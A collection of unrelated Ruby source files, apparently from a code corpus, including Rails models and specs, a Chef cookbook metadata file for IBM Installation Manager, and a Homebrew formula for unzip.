end
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
context 'when it has deployment' do
let!(:deployment) do
create(:deployment, environment: environment)
end
it 'shows that deployment will be overwritten' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'when environment does not exist' do
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).not_to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'job that failed to deploy and environment has not been created' do
let(:build) do
create(:ci_build, :failed, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'The deployment of this job to staging did not succeed'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job that will deploy and environment has not been created' do
let(:build) do
create(:ci_build, :running, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).not_to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'when job is running' do
before do
build.run!
render
end
it 'does not show retry button' do
expect(rendered).not_to have_link('Retry')
end
it 'does not show New issue button' do
expect(rendered).not_to have_link('New issue')
end
end
describe 'commit title in sidebar' do
let(:commit_title) { project.commit.title }
it 'shows commit title and not show commit message' do
render
expect(rendered).to have_css('p.build-light-text.append-bottom-0',
text: /\A\n#{Regexp.escape(commit_title)}\n\Z/)
end
end
describe 'shows trigger variables in sidebar' do
let(:trigger_request) { create(:ci_trigger_request_with_variables, pipeline: pipeline) }
before do
build.trigger_request = trigger_request
render
end
it 'shows trigger variables in separate lines' do
expect(rendered).to have_css('.js-build-variable', visible: false, text: 'TRIGGER_KEY_1')
expect(rendered).to have_css('.js-build-variable', visible: false, text: 'TRIGGER_KEY_2')
expect(rendered).to have_css('.js-build-value', visible: false, text: 'TRIGGER_VALUE_1')
expect(rendered).to have_css('.js-build-value', visible: false, text: 'TRIGGER_VALUE_2')
end
end
end
| 29.595349 | 95 | 0.636649 |
21d04292246da3115b4e3f78d378fa7528753dd8 | 517 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2017_09_15_preview
module Models
#
# Defines values for TopicTypeProvisioningState
#
module TopicTypeProvisioningState
Creating = "Creating"
Updating = "Updating"
Deleting = "Deleting"
Succeeded = "Succeeded"
Canceled = "Canceled"
Failed = "Failed"
end
end
end
| 24.619048 | 70 | 0.690522 |
bfecbd85f220a67de6d48ea267da7214039c6a28 | 3,103 | # == Schema Information
#
# Table name: research_journal_articles
#
# id :uuid not null, primary key
# abstract :text
# keywords :text
# old_text :text
# position :integer
# published :boolean default(FALSE)
# published_at :date
# references :text
# slug :string
# title :string
# created_at :datetime not null
# updated_at :datetime not null
# research_journal_id :uuid not null
# research_journal_volume_id :uuid
# university_id :uuid not null
# updated_by_id :uuid
#
# Indexes
#
# index_research_journal_articles_on_research_journal_id (research_journal_id)
# index_research_journal_articles_on_research_journal_volume_id (research_journal_volume_id)
# index_research_journal_articles_on_university_id (university_id)
# index_research_journal_articles_on_updated_by_id (updated_by_id)
#
# Foreign Keys
#
# fk_rails_... (research_journal_id => research_journals.id)
# fk_rails_... (research_journal_volume_id => research_journal_volumes.id)
# fk_rails_... (university_id => universities.id)
# fk_rails_... (updated_by_id => users.id)
#
class Research::Journal::Article < ApplicationRecord
include WithGit
include WithBlobs
include WithPosition
has_rich_text :text
has_one_attached :pdf
belongs_to :university
belongs_to :journal, foreign_key: :research_journal_id
belongs_to :volume, foreign_key: :research_journal_volume_id, optional: true
belongs_to :updated_by, class_name: 'User'
has_and_belongs_to_many :persons,
class_name: 'University::Person',
join_table: :research_journal_articles_researchers,
association_foreign_key: :researcher_id
has_many :websites, -> { distinct }, through: :journal
validates :title, presence: true
before_validation :set_published_at, if: :published_changed?
scope :published, -> { where(published: true) }
def git_path(website)
"content/articles/#{published_at.year}/#{published_at.strftime "%Y-%m-%d"}-#{slug}.html" if (volume.nil? || volume.published_at) && published_at
end
def git_dependencies(website)
[self] +
active_storage_blobs +
other_articles_in_the_volume +
persons +
persons.map(&:researcher)
end
def to_s
"#{ title }"
end
def path
"/#{slug}"
end
protected
def other_articles_in_the_volume
return [] if volume.nil?
volume.articles.where.not(id: self)
end
def last_ordered_element
Research::Journal::Article.where(
university_id: university_id,
research_journal_volume_id: research_journal_volume_id
).ordered.last
end
def explicit_blob_ids
super.concat [pdf&.blob_id]
end
def set_published_at
self.published_at = published? ? Time.zone.now : nil
end
end
| 30.421569 | 148 | 0.647438 |
d5e4d3601469c41a8a4b6d57c5182e4ae700ee2c | 2,830 | if ENV['CI']
require 'simplecov'
SimpleCov.start
end
# This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
require 'spec_helper'
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => e
puts e.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
end
| 42.238806 | 86 | 0.748057 |
871c765d257b7d2977f14e157c87fbd7ff80d67d | 2,173 | =begin
#Selling Partner API for Catalog Items
#The Selling Partner API for Catalog Items provides programmatic access to information about items in the Amazon catalog. For more information, see the [Catalog Items API Use Case Guide](https://github.com/amzn/selling-partner-api-docs/blob/main/guides/en-US/use-case-guides/catalog-items-api-use-case-guide/catalog-items-api-use-case-guide_2020-12-01.md).
OpenAPI spec version: 2020-12-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::CatalogItems_20201201::ItemImage
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'ItemImage' do
before do
# run before each test
@instance = AmzSpApi::CatalogItems_20201201::ItemImage.new
end
after do
# run after each test
end
describe 'test an instance of ItemImage' do
it 'should create an instance of ItemImage' do
expect(@instance).to be_instance_of(AmzSpApi::CatalogItems_20201201::ItemImage)
end
end
describe 'test attribute "variant"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
# validator = Petstore::EnumTest::EnumAttributeValidator.new('String', ["MAIN", "PT01", "PT02", "PT03", "PT04", "PT05", "PT06", "PT07", "PT08", "SWCH"])
# validator.allowable_values.each do |value|
# expect { @instance.variant = value }.not_to raise_error
# end
end
end
describe 'test attribute "link"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "height"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "width"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 34.492063 | 357 | 0.724344 |
5df7ef0eaefb392adb3961f315cc2e4154ec6d08 | 602 | module JavaPackageModuleTemplate
class << self
def const_missing(const)
JavaUtilities.get_proxy_class(@package_name + const.to_s)
end
private :const_missing
def method_missing(sym, *args)
Kernel.raise ArgumentError, "Java package `#{package_name}' does not have a method `#{sym}'" unless args.empty?
JavaUtilities.get_proxy_or_package_under_package self, sym
end
private :method_missing
def package_name
# strip off trailing .
@package_name[0..-2]
end
end
end
# pull in the default package
JavaUtilities.get_package_module("Default")
| 27.363636 | 117 | 0.719269 |
d59332b4529e8b974230ab27ec25983e88344b6f | 426 | class Student
attr_reader :grade,
:grades
def initialize
@grades = ["A", "B", "C", "D", "F"]
@grade =@grades[2]
end
def study
index = @grades.index(@grade)
if index == 0
index = 0
else
@grade =@grades[index - 1]
end
end
def slack_off
index = @grades.index(@grade)
if index == 4
index = 4
else
@grade =@grades[index + 1]
end
end
end
| 15.777778 | 39 | 0.516432 |
01d8e93cd6e31b64743318097049f2e7d00f3240 | 1,029 | $:.push File.expand_path('../lib', __FILE__)
require 'screen-object/version'
Gem::Specification.new do |s|
s.name = 'screen-object'
s.version = ScreenObject::VERSION
s.platform = Gem::Platform::RUBY
s.authors = ['Sreepad Bhagwat','Shailendra Jain']
s.license = 'APACHE 2.0'
s.homepage = 'https://github.com/capitalone/screen-object'
s.summary = 'Page Object like DSL for testing mobile application'
s.description = 'Page Object like DSL for testing mobile application'
s.files = `git ls-files | grep -v sample_app`.split("\n")
s.test_files = `git ls-files -- {spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
s.require_paths = ['lib']
s.add_runtime_dependency 'appium_lib', '~> 9.11.1', '>= 9.11.1'
s.add_runtime_dependency 'page_navigation', '~> 0.9'
s.add_runtime_dependency 'childprocess', '~> 0.5'
s.add_development_dependency 'cucumber', '~> 1.3', '>= 1.3.0'
s.add_development_dependency 'rspec', '~> 3.1', '>= 3.1.0'
end
| 36.75 | 82 | 0.670554 |
ffc2b8f9564967bf11db603e0ce29e1ba9894f6e | 366 | module Neo4j::Driver
module Internal
module Messaging
module Encode
class PullAllMessageEncoder
def encode(message, packer)
Util::Preconditions.check_argument(message, Request::PullAllMessage)
packer.pack_struct_header(0, Request::PullAllMessage::SIGNATURE)
end
end
end
end
end
end
| 24.4 | 80 | 0.650273 |
e2192dbe94ea4057dfccf676308edae14ec76ca1 | 1,106 | require File.join(File.expand_path(File.dirname(__FILE__)), '..', 'test_helper')
class ApiKeyTest < ActiveSupport::TestCase
test "should create API key" do
assert_difference 'ApiKey.count' do
create_api_key
end
end
test "should generate expiration date" do
t = Time.parse('2015-01-01 09:00:00')
Time.stubs(:now).returns(t)
k = create_api_key
Time.unstub(:now)
assert_equal Time.parse('2015-01-31 09:00:00'), k.reload.expire_at
end
test "should generate access token" do
k = create_api_key
assert_kind_of String, k.reload.access_token
end
test "should generate random data" do
assert_kind_of String, random_string
assert_kind_of Integer, random_number
assert_kind_of String, random_email
end
test "should have application" do
ApiKey.stubs(:applications).returns([nil, 'test'])
k1 = create_api_key
assert_nil k1.application
k2 = create_api_key application: 'test'
assert_equal 'test', k2.application
assert_raises ActiveRecord::RecordInvalid do
create_api_key application: 'invalid'
end
end
end
| 27.65 | 80 | 0.717902 |
1c29feb65fbecc0570c5abc25959eab4d07a176a | 1,109 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20200521045514) do
create_table "brews", force: :cascade do |t|
t.string "brewery"
t.string "beer_name"
t.string "package_date"
t.string "abv"
t.integer "user_id"
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password_digest"
end
end
| 35.774194 | 86 | 0.746619 |
d5c77e40a4cc534e6ad61d0907f894d4402fe67f | 13,859 | name 'im'
maintainer 'IBM Corp'
maintainer_email ''
license 'Copyright IBM Corp. 2016, 2017'
provides 'im'
depends 'ibm_cloud_utils'
supports 'rhel', '>= 7.0'
supports 'ubuntu', '>= 14.04'
description <<-EOH
## DESCRIPTION
This cookbook provides a lightweight resource/provider (LWRP) that can be used to install IBM Installation Manager (IM) and IBM products using the IBM Installation Manager.
## Versions
* IBM IM V1.8.5, V1.8.6
## Use Cases
* IM installation
* IM upgrade to the latest IM version included in IM repository.
* Installation of any package included in IM repository (IHS - com.ibm.websphere.IHS.v85_8.5.5009.20160225_0435.jar ; WAS ND - com.ibm.websphere.ND.v85_8.5.5009.20160225_0435.jar; etc.)
## Platform Pre-Requisites
* Linux YUM Repository - An onsite linux YUM Repsoitory is required.
## Software Repository
SW_REPO_ROOT -> Stored in the ['ibm']['sw_repo'] attribute.
## IM Package Repository
IM_REPO -> Stored in the ['ibm']['im_repo'] attribute.
Relative to the software repository, the installation files must be stored in the following location.
* BASE FILES -> /im/v1x/base/
The following is a description of files needed on the REPO Server depending on version and architecture.
```python
case node['platform_family']
when 'rhel' || 'debian'
case node['kernel']['machine']
when 'x86_64'
default['im']['arch'] = 'x86_64'
# <> Installation Manager Version 1.8.5, 1.8.6
force_override['im']['archive_names'] =
{ '1.8.5' => { 'filename' => 'agent.installer.linux.gtk.' + node['im']['arch'] + '_1.8.5000.20160506_1125.zip',
'sha256' => '76190adf69f6e4a6a8d7432983f5aebe68d56545a3a13b3ecd6b25c12d433b04' },
'1.8.6' => { 'filename' => 'agent.installer.linux.gtk.' + node['im']['arch'] + '_1.8.6000.20161118_1611.zip',
'sha256' => 'b253a06bccace5934b108632487182f6a6f659082fea69372242b9865a64e4f3' } }
end
```
# Resources
* [im_install] - Installs IBM Installation Manager. Installs an IBM product by executing the IBM Installation manager.
## im_install
Installs IBM Installation Manager. Installs an IBM product by executing the IBM Installation manager.
### Actions
- install_im: Installs IBM Installation Manager.
- upgrade_im: Installs the latest fixpack available in IM Repository for IBM Installation Manager.
- install: Default action. Installs an IBM product by executing the IBM Installation manager.
### Attribute Parameters
<table>
<tr>
<td>LWRP Attribute</td>
<td>Description</td>
<td>Default</td>
</tr>
<tr>
<td><code>repositories</code></td>
<td>The IM repository.</td>
<td><code>node['ibm']['im_repo']</code></td>
</tr>
<tr>
<td><code>secure_repo</code></td>
<td>If the IM repo is public this should be set to "false"</td>
<td><code>'true'</code></td>
</tr>
<tr>
<td><code>im_repo_user</code></td>
<td>User used to access IM repo if this repo is secured and authentication is required This is not required if IM repo is not secured.</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>im_repo_nonsecureMode</code></td>
<td>If the IM repo is secured but it uses a self signed SSL certificate this should be set to "true"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>repo_nonsecureMode</code></td>
<td>If the Software repo is secured but it uses a self signed SSL certificate this should be set to "true"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>response_file</code></td>
<td>The response file for the IBM Installation Manager.</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>install_dir</code></td>
<td>Installation directory for the product that is installed using this LWRP</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>offering_id</code></td>
<td>Offering ID. You can find the value in your IMRepo. Each Product has a different ID (e.g. com.ibm.websphere.IHS.v85, com.ibm.websphere.PLG.v85, com.ibm.websphere.ND.v85 )</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_offering_id</code></td>
<td>Java offering ID. You can find the value in your IMRepo. Each Product has a different ID</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>offering_version</code></td>
<td>Offering version. You can find the value in your IMRepo. Each Product has a different offering version</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_offering_version</code></td>
<td>Java offering version. You can find the value in your IMRepo. Each Product has a different offering version</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>profile_id</code></td>
<td>Profile ID. This is a short description of the product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>feature_list</code></td>
<td>Feature list for the product. This is a list of components that should be installed for a specific product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_feature_list</code></td>
<td>Java feature list for the product. This is a list of components that should be installed for a specific product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>install_java</code></td>
<td>Flag for Java Installation. Supports "true" or "false"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>im_shared_dir</code></td>
<td>Directory where installation artifacts are stored.</td>
<td><code>'/opt/IBM/IMShared'</code></td>
</tr>
<tr>
<td><code>user</code></td>
<td>User used to install IM and that should be used to install a product. It should be created before calling im_install LWRP</td>
<td><code>'root'</code></td>
</tr>
<tr>
<td><code>group</code></td>
<td>Group used to install IM and that should be used to install a product. It should be created before calling im_install LWRP</td>
<td><code>'root'</code></td>
</tr>
<tr>
<td><code>im_install_mode</code></td>
<td>Installation mode used to install IM and that should be used to install a product. Supports "admin", "nonAdmin" or "group"</td>
<td><code>'admin'</code></td>
</tr>
<tr>
<td><code>im_install_dir</code></td>
<td>Directory where im will be installed</td>
<td><code>'/opt/IBM/InstallationManager'</code></td>
</tr>
<tr>
<td><code>log_dir</code></td>
<td>An absolute path to a directory that will be used to hold any persistent files created as part of the automation</td>
<td><code>'node['ibm']['evidence_path']'</code></td>
</tr>
<tr>
<td><code>version</code></td>
<td>Installation Manager Version Number to be installed. Supported versions: 1.8.5, 1.8.6</td>
<td><code>node['im']['version']</code></td>
</tr>
<tr>
<td><code>im_data_dir</code></td>
<td>Installation Manager Data Directory</td>
<td><code>'/var/ibm/InstallationManager'</code></td>
</tr>
</table>
### examples
Installing IM and IHS from a public IM repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "http://<hostname>:<port>/<path>"
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing a specific version of IM and IHS from a public IM repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "http://<hostname>:<port>/<path>"
version '1.8.6'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing IM and IHS from a password protected repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing IM and IHS from a password protected repository (both using a self signed certificate) using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
im_repo_nonsecureMode 'true'
repo_nonsecureMode 'true'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing WASND and Java from a password protected repository (IM repo using a self signed certificate) using nonAdmin installation mode. Assuming that IM is already installed.
```ruby
im_install "com.ibm.websphere.ND.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
im_repo_nonsecureMode 'true'
install_dir /home/wasadmin/opt/IBM/WebSphere/AppServer
response_file "WASv85.install.xml"
offering_id "com.ibm.websphere.ND.v85"
offering_version '8.5.5008.20151112_0939'
profile_id "IBM WebSphere Application Server V8.5"
feature_list "core.feature,ejbdeploy,thinclient,embeddablecontainer,com.ibm.sdk.6_64bit"
install_java "true"
java_feature_list "com.ibm.sdk.7"
java_offering_id "com.ibm.websphere.IBMJAVA.v70"
java_offering_version "7.0.9030.20160224_1826"
im_install_mode 'nonAdmin'
user 'wasadmin'
group 'wasgroup'
action [:install]
end
```
Response file template:
```ruby
<?xml version="1.0" encoding="UTF-8"?>
<!-- ##### Copyright ######################################################
# Licensed Materials - Property of IBM (c) Copyright IBM Corp. 2012.
# All Rights Reserved. US Government Users Restricted Rights-Use, duplication
# or disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
####################################################################### -->
<agent-input clean="true" temporary="true">
<server>
<repository location='<%= @REPO_LOCATION %>' />
</server>
<install modify='false'>
<offering id='<%= @OFFERING_ID %>' version='<%= @OFFERING_VERSION %>' profile='<%= @PROFILE_ID %>' features='<%= @FEATURE_LIST %>' installFixes='none'/>
<% if @INSTALL_JAVA == "true" %>
<offering id='<%= @JAVA_OFFERING_ID %>' version='<%= @JAVA_OFFERING_VERSION %>' profile='<%= @PROFILE_ID %>' features='<%= @JAVA_FEATURE_LIST %>' installFixes='none'/>
<% end %>
</install>
<profile id='<%= @PROFILE_ID %>' installLocation='<%= @INSTALL_LOCATION %>'>
<data key='eclipseLocation' value='<%= @INSTALL_LOCATION %>'/>
<data key='user.import.profile' value='false'/>
<data key='cic.selector.nl' value='en'/>
<% if @OFFERING_ID.include? "IHS" %>
<data key='user.ihs.httpPort' value='<%= node['ihs']['port'] %>'/>
<data key='user.ihs.allowNonRootSilentInstall' value='true'/>
<% end %>
</profile>
<preference name='com.ibm.cic.common.core.preferences.connectTimeout' value='30'/>
<preference name='com.ibm.cic.common.core.preferences.readTimeout' value='45'/>
<preference name='com.ibm.cic.common.core.preferences.downloadAutoRetryCount' value='0'/>
<preference name='offering.service.repositories.areUsed' value='false'/>
<preference name='com.ibm.cic.common.core.preferences.ssl.nonsecureMode' value='<%= @IM_REPO_NONSECUREMODE %>'/>
<preference name='com.ibm.cic.common.core.preferences.http.disablePreemptiveAuthentication' value='false'/>
<preference name='http.ntlm.auth.kind' value='NTLM'/>
<preference name='http.ntlm.auth.enableIntegrated.win32' value='true'/>
<preference name='com.ibm.cic.common.core.preferences.keepFetchedFiles' value='false'/>
<preference name='PassportAdvantageIsEnabled' value='false'/> <%# ~password_checker %>
<preference name='com.ibm.cic.common.core.preferences.searchForUpdates' value='false'/>
<preference name='com.ibm.cic.agent.ui.displayInternalVersion' value='false'/>
<preference name='com.ibm.cic.common.core.preferences.eclipseCache' value='<%= @IMSHARED %>'/>
```
EOH
version '1.0.2'
recipe 'im::cleanup.rb', '
Cleanup recipe ( cleanup.rb )
This recipe will delete temp directory where installers were copied as they are not required any further.
'
recipe 'im::default.rb', '
Default recipe (default.rb)
The default recipe for the cookbook. It is recommended to not use the default recipe, but explicitly specify a run_list for the deployment node.
'
recipe 'im::environment_check.rb', '
environment_check recipe (environment_check.rb)
This recipe will test that the external environment is ready to have a cookbook installed
'
recipe 'im::fixpack.rb', '
Fixpack recipe (fixpack.rb)
This recipe performs product fixpack installation.
'
recipe 'im::gather_evidence.rb', '
Gather evidence recipe (gather_evidence.rb)
It will create log file mentioning installed application version.
'
recipe 'im::install.rb', '
Install recipe (install.rb)
Installation recipe, source the version, unpack the file and install product
'
recipe 'im::prereq.rb', '
Prerequisites recipe (prereq.rb)
This recipe configures the operating prerequisites for the pattern.
'
| 42.12462 | 185 | 0.699978 |
910dc240e4c100ec91b4a8fc5b842488548f1285 | 3,476 | class Unzip < Formula
desc "Extraction utility for .zip compressed archives"
homepage "https://infozip.sourceforge.io/UnZip.html"
url "https://downloads.sourceforge.net/project/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/unzip60.tar.gz"
version "6.0"
sha256 "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
revision 6
livecheck do
url :stable
regex(%r{url=.*?(?:%20)?v?(\d+(?:\.\d+)+)/unzip\d+\.t}i)
end
bottle do
cellar :any_skip_relocation
sha256 "178cea56554b0e6b74856203340554c7615c6ed2e122059c78370e35c896f0ce" => :catalina
sha256 "f0b95f2d5c664f45686f3aa318384906014ed28939da28020d12138f025aaeb6" => :mojave
sha256 "6dd7d0862f5a8b954dd94b3c91378209e0086eec7c5be367af0d8c330bc099da" => :high_sierra
sha256 "f4d59c04a44f93a30a23ec403784c73f9c06db9b72f3277679f66b1870a94331" => :sierra
end
keg_only :provided_by_macos
uses_from_macos "bzip2"
# Upstream is unmaintained so we use the Debian patchset:
# https://packages.debian.org/buster/unzip
patch do
url "https://deb.debian.org/debian/pool/main/u/unzip/unzip_6.0-25.debian.tar.xz"
sha256 "0783e4d11d755cb43904e3f59a60dbb92ee9c6b08ac54d86bc61f9848216f37b"
apply %w[
patches/01-manpages-in-section-1-not-in-section-1l.patch
patches/02-this-is-debian-unzip.patch
patches/03-include-unistd-for-kfreebsd.patch
patches/04-handle-pkware-verification-bit.patch
patches/05-fix-uid-gid-handling.patch
patches/06-initialize-the-symlink-flag.patch
patches/07-increase-size-of-cfactorstr.patch
patches/08-allow-greater-hostver-values.patch
patches/09-cve-2014-8139-crc-overflow.patch
patches/10-cve-2014-8140-test-compr-eb.patch
patches/11-cve-2014-8141-getzip64data.patch
patches/12-cve-2014-9636-test-compr-eb.patch
patches/13-remove-build-date.patch
patches/14-cve-2015-7696.patch
patches/15-cve-2015-7697.patch
patches/16-fix-integer-underflow-csiz-decrypted.patch
patches/17-restore-unix-timestamps-accurately.patch
patches/18-cve-2014-9913-unzip-buffer-overflow.patch
patches/19-cve-2016-9844-zipinfo-buffer-overflow.patch
patches/20-cve-2018-1000035-unzip-buffer-overflow.patch
patches/21-fix-warning-messages-on-big-files.patch
patches/22-cve-2019-13232-fix-bug-in-undefer-input.patch
patches/23-cve-2019-13232-zip-bomb-with-overlapped-entries.patch
patches/24-cve-2019-13232-do-not-raise-alert-for-misplaced-central-directory.patch
]
end
def install
system "make", "-f", "unix/Makefile",
"CC=#{ENV.cc}",
"LOC=-DLARGE_FILE_SUPPORT",
"D_USE_BZ2=-DUSE_BZIP2",
"L_BZ2=-lbz2",
"macosx",
"LFLAGS1=-liconv"
system "make", "prefix=#{prefix}", "MANDIR=#{man1}", "install"
end
test do
(testpath/"test1").write "Hello!"
(testpath/"test2").write "Bonjour!"
(testpath/"test3").write "Hej!"
system "/usr/bin/zip", "test.zip", "test1", "test2", "test3"
%w[test1 test2 test3].each do |f|
rm f
refute_predicate testpath/f, :exist?, "Text files should have been removed!"
end
system bin/"unzip", "test.zip"
%w[test1 test2 test3].each do |f|
assert_predicate testpath/f, :exist?, "Failure unzipping test.zip!"
end
assert_match "Hello!", File.read(testpath/"test1")
assert_match "Bonjour!", File.read(testpath/"test2")
assert_match "Hej!", File.read(testpath/"test3")
end
end
| 38.197802 | 111 | 0.713176 |
28252df18f7faeddf98c2037b3196f23de338f74 | 213 | module Cucumber #:nodoc:
class VERSION #:nodoc:
MAJOR = 0
MINOR = 3
TINY = 98
PATCH = nil # Set to nil for official release
STRING = [MAJOR, MINOR, TINY, PATCH].compact.join('.')
end
end
| 19.363636 | 58 | 0.610329 |
b9fc03922c7dec7f42d704fadb6b68bca16b5495 | 700 | # frozen_string_literal: true
module Screenshots
class CreateMessageThreadsService
prepend BasicService
option :message_threads
def call
prepared_threads = @message_threads.map do |thread|
{
id: thread['threadId'],
date: thread['threadModifiedDate'],
message_thread_name: thread['latestMessageEventDetail']['sender']['onlineId']
}
end
prepared_threads.each do |thread|
player = Player.find(message_thread_name: thread[:message_thread_name])
player&.add_message_thread(
MessageThread.new(message_thread_id: thread[:id], last_modified_date: thread[:date])
)
end
end
end
end
| 25.925926 | 94 | 0.665714 |
e27d579c75bad329d00880233ed09c837f47cb80 | 712 | require_dependency "conference_plugin_constraint"
ConferencePlugin::Engine.routes.draw do
get "/" => "conference_plugin#index", constraints: ConferencePluginConstraint.new
get "/schedule" => "conference_plugin#schedule", constraints: ConferencePluginConstraint.new
get "/show" => "conference_plugin#show", constraints: ConferencePluginConstraint.new
post "/schedule" => "conference_plugin#create", constraints: ConferencePluginConstraint.new
delete "/clear" => "conference_plugin#clear", constraints: ConferencePluginConstraint.new
get "/actions" => "actions#index", constraints: ConferencePluginConstraint.new
get "/actions/:id" => "actions#show", constraints: ConferencePluginConstraint.new
end
| 59.333333 | 94 | 0.793539 |
